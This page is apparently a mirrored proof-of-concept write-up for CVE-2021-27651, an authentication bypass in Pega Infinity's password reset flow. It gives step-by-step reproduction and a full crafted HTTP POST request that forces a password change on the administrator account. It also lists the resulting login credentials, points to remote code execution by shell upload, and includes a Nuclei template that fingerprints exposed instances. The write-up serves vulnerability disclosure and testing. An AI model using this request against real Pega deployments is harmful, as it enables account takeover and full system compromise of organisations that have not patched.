Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-27651 PoC — PEGA pega infinity 授权问题漏洞

Source
https://github.com/orangmuda/CVE-2021-27651
Associated Vulnerability
Title:PEGA pega infinity 授权问题漏洞 (CVE-2021-27651)
Description:In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
Description
bypass all stages of the password reset flow
Readme
## Summary
An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by (1) initiating the password reset flow and typing in the victim email, then (2) forcing the HTTP POST request to update the password through. An attacker could login using the newly edited account and fully compromise the Pega instance via the many acceptable post-auth code execution vectors (modifying dynamic pages, templating, etc.)

## Steps to Reproduce
1. Browse to the login page of any Pega instance
2. Click "reset password"
3. Type in "administrator@pega.com", proxy the HTTP request, send the HTTP request with the "administrator@pega.com" to the Burp repeater tab or any similar tab, then allow the request to go through by disabling the proxy or clicking "send"
4. After allowing the initial request to go through, modify the HTTP requests body in the repeater so it includes the following data...

```
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
```

5. Login using the following credentials after sending the HTTP request, having bypassed the confirmation part of reset password and being able to login to the administrator account...

```
administrator@pega.com / Rules@1234
```

6. From there, you can achieve RCE via any of the many accepted use administrator-only code execution vectors

## Affected Versions
Pega Infinity >= 8.2.1
Pega Infinity <= 8.5.2

## Impact
Full compromise of any Pega instance with no prerequisite knowledge.

## Supporting Media
![Password bypass](https://i.imgur.com/kxLRhys.png)
* Password bypass

![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
* Remote code execution via shell upload

## Nuclei Template
```
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
```

## Credit
Andri Wijayanti (@andridev_),
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →